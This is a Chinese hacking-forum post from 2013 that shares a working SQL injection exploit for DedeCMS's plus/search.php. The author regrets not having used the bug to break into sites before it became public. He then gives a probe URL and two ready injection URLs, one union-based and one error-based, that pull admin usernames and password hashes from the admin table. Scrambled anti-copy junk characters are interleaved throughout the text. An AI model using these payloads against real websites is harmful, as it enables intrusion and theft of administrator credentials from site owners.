中国网络渗透测试联盟

标题: [通杀]dedecms plus/search.php 注入漏洞利用EXP [打印本页]
作者: admin    时间: 2013-1-21 08:45
标题: [通杀]dedecms plus/search.php 注入漏洞利用EXP
转载不加作者名的没JJ
' Q% T. N+ i2 I
* q  ?* y& \. ^8 b/ I( _& v哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站  放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
5 Q( c+ u& c0 K2 Q- C$ `. K! |# X$ d8 ]7 L% l* R
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
& w/ n% w. ~7 x" E3 N2 q; x/ ]
0 ?1 n5 \$ B5 |我一般是这样测试的:2 c/ _. Z4 @, C9 Q6 ^4 h, s
9 ~/ Z# N2 a( Y& p' O( }, T* R
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a8 P+ q8 M* {7 x; H4 x/ C% R

3 o; ^: O2 J. |8 B  d8 Y1 Y) _6 i转载不加作者名的没JJ, S1 e7 _& c3 ]% a3 d
/ H1 M9 N* l3 E& |3 E' r
作者:鬼哥
% U% B6 w# y9 m$ b9 Y2 C# C* l) h; i; K5 E- H' b9 |4 @6 q
# |' p7 R3 d) y, [# s' `# b" o9 H
1 m2 i4 N( K% x- L
看结果如果提示0 {3 q+ k( ?( v3 {& Q
$ D5 w# N) T6 z% N! `" A
Safe Alert: Request Error step 2 !. {4 N6 @0 L0 Z( y  n( m  i, ~

2 X+ n0 ~+ @. Y2 L; ]那么直接用下面的exp9 K' y8 u( [" T8 }5 I

) K% g. v( {) P7 r* O  ?( H2 cxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a/ R1 U; e" H7 J5 Y
/ ^9 x* k& @6 f: z9 [9 @
  }) T  `+ S% c4 O# ]
看结果如果提示
0 y/ c9 G5 J, d' h0 ^' x* h% x
/ e  {6 \6 A* \4 O8 I8 ~+ BSafe Alert: Request Error step 1 !
8 _" U0 W  t; }3 B: {% N$ r. K4 C; N3 S
那么直接用下面的exp
- f- A$ }; ]& f" u- |: d7 ?. ?% e  \  u4 {8 Q: @0 M% L
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
2 t) S7 d5 Y' v2 f' c
. g$ d, C6 W* g2 x2 }
7 c9 Q( g$ w/ s5 O$ i如果正常显示证明漏洞不存在了。
4 V+ S  e' i5 X) k9 @5 Z/ e$ k0 i. R. d  f* z4 H0 q: @
转载不加作者名的没JJ



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2